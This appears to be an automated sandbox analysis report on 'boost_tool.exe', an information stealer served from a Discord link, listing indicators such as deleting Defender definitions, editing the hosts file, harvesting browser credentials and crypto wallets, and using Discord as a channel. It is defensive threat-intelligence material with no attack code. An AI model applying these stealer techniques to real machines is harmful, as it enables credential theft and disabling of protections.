hxxps://cdn[.]discordapp[.]com/attachments/1210062749372256297/1210066881046773760/boost_tool[.]exe?ex=65e9359a&is=65d6c09a&hm=75fd977972c2d80ba7a06406860211ff842788b65bd80bbe0d3a54921037797f&

Analysis

max time kernel
600s
max time network
604s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
22-02-2024 03:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1210062749372256297/1210066881046773760/boost_tool.exe?ex=65e9359a&is=65d6c09a&hm=75fd977972c2d80ba7a06406860211ff842788b65bd80bbe0d3a54921037797f&

Score

10^/10

evasion spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 2 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5452	MpCmdRun.exe
5860	MpCmdRun.exe

Downloads MZ/PE file

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	boost_tool.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	boost_tool.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 6 IoCs

pid	Process
4800	boost_tool.exe
2548	boost_tool.exe
5948	rar.exe
4588	boost_tool.exe
3648	boost_tool.exe
5648	rar.exe

Loads dropped DLL 33 IoCs

pid	Process
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
2548	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe
3648	boost_tool.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 51 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001ac7f-163.dat	upx
behavioral1/files/0x000600000001ac7f-164.dat	upx
behavioral1/memory/2548-167-0x00007FFCB9BD0000-0x00007FFCBA1B8000-memory.dmp	upx
behavioral1/files/0x000600000001ac72-170.dat	upx
behavioral1/files/0x000600000001ac79-189.dat	upx
behavioral1/memory/2548-190-0x00007FFCC93B0000-0x00007FFCC93BF000-memory.dmp	upx
behavioral1/files/0x000600000001ac78-188.dat	upx
behavioral1/files/0x000600000001ac77-187.dat	upx
behavioral1/files/0x000600000001ac76-186.dat	upx
behavioral1/files/0x000600000001ac75-185.dat	upx
behavioral1/files/0x000600000001ac74-184.dat	upx
behavioral1/files/0x000600000001ac73-183.dat	upx
behavioral1/files/0x000600000001ac71-182.dat	upx
behavioral1/files/0x000600000001ac84-181.dat	upx
behavioral1/files/0x000600000001ac83-180.dat	upx
behavioral1/files/0x000600000001ac82-179.dat	upx
behavioral1/files/0x000600000001ac7e-176.dat	upx
behavioral1/files/0x000600000001ac7c-175.dat	upx
behavioral1/files/0x000600000001ac7d-173.dat	upx
behavioral1/memory/2548-172-0x00007FFCBA3A0000-0x00007FFCBA3C4000-memory.dmp	upx
behavioral1/memory/2548-196-0x00007FFCBA370000-0x00007FFCBA39D000-memory.dmp	upx
behavioral1/memory/2548-198-0x00007FFCBA490000-0x00007FFCBA4A9000-memory.dmp	upx
behavioral1/memory/2548-200-0x00007FFCBA340000-0x00007FFCBA363000-memory.dmp	upx
behavioral1/files/0x000600000001ac83-201.dat	upx
behavioral1/memory/2548-202-0x00007FFCB9A50000-0x00007FFCB9BC3000-memory.dmp	upx
behavioral1/memory/2548-204-0x00007FFCBA320000-0x00007FFCBA339000-memory.dmp	upx
behavioral1/memory/2548-208-0x00007FFCBA2F0000-0x00007FFCBA31E000-memory.dmp	upx
behavioral1/files/0x000600000001ac7e-209.dat	upx
behavioral1/memory/2548-207-0x00007FFCC8C00000-0x00007FFCC8C0D000-memory.dmp	upx
behavioral1/files/0x000600000001ac7c-210.dat	upx
behavioral1/files/0x000600000001ac7c-211.dat	upx
behavioral1/memory/2548-213-0x00007FFCBA3A0000-0x00007FFCBA3C4000-memory.dmp	upx
behavioral1/memory/2548-212-0x00007FFCB9BD0000-0x00007FFCBA1B8000-memory.dmp	upx
behavioral1/memory/2548-214-0x00007FFCBA230000-0x00007FFCBA2E8000-memory.dmp	upx
behavioral1/memory/2548-215-0x00007FFCB96D0000-0x00007FFCB9A45000-memory.dmp	upx
behavioral1/memory/2548-222-0x00007FFCC7450000-0x00007FFCC745D000-memory.dmp	upx
behavioral1/memory/2548-224-0x00007FFCBA210000-0x00007FFCBA224000-memory.dmp	upx
behavioral1/memory/2548-226-0x00007FFCB9550000-0x00007FFCB966C000-memory.dmp	upx
behavioral1/files/0x000600000001ac84-225.dat	upx
behavioral1/memory/2548-266-0x00007FFCBA340000-0x00007FFCBA363000-memory.dmp	upx
behavioral1/memory/2548-268-0x00007FFCB9A50000-0x00007FFCB9BC3000-memory.dmp	upx
behavioral1/memory/2548-285-0x00007FFCBA320000-0x00007FFCBA339000-memory.dmp	upx
behavioral1/memory/2548-401-0x00007FFCBA2F0000-0x00007FFCBA31E000-memory.dmp	upx
behavioral1/memory/2548-406-0x00007FFCB96D0000-0x00007FFCB9A45000-memory.dmp	upx
behavioral1/memory/2548-418-0x00007FFCBA230000-0x00007FFCBA2E8000-memory.dmp	upx
behavioral1/memory/2548-424-0x00007FFCB9BD0000-0x00007FFCBA1B8000-memory.dmp	upx
behavioral1/memory/2548-432-0x00007FFCBA3A0000-0x00007FFCBA3C4000-memory.dmp	upx
behavioral1/memory/2548-499-0x00007FFCB9550000-0x00007FFCB966C000-memory.dmp	upx
behavioral1/memory/2548-661-0x00007FFCBA3A0000-0x00007FFCBA3C4000-memory.dmp	upx
behavioral1/memory/2548-666-0x00007FFCB9A50000-0x00007FFCB9BC3000-memory.dmp	upx
behavioral1/memory/2548-660-0x00007FFCB9BD0000-0x00007FFCBA1B8000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
39	discord.com
40	discord.com
46	discord.com
47	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
36	ip-api.com
44	ip-api.com

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\4183903823\810424605.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	taskmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5168	WMIC.exe
4476	WMIC.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery

T1057

pid	Process
5200	tasklist.exe
5440	tasklist.exe
4216	tasklist.exe
2856	tasklist.exe
5144	tasklist.exe
928	tasklist.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5176	systeminfo.exe
3568	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{3FB80C88-93C9-4A73-8B5F-FDFE01FED2D6} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\boost_tool.exe.wnqvaq9.partial:Zone.Identifier	browser_broker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
96	taskmgr.exe
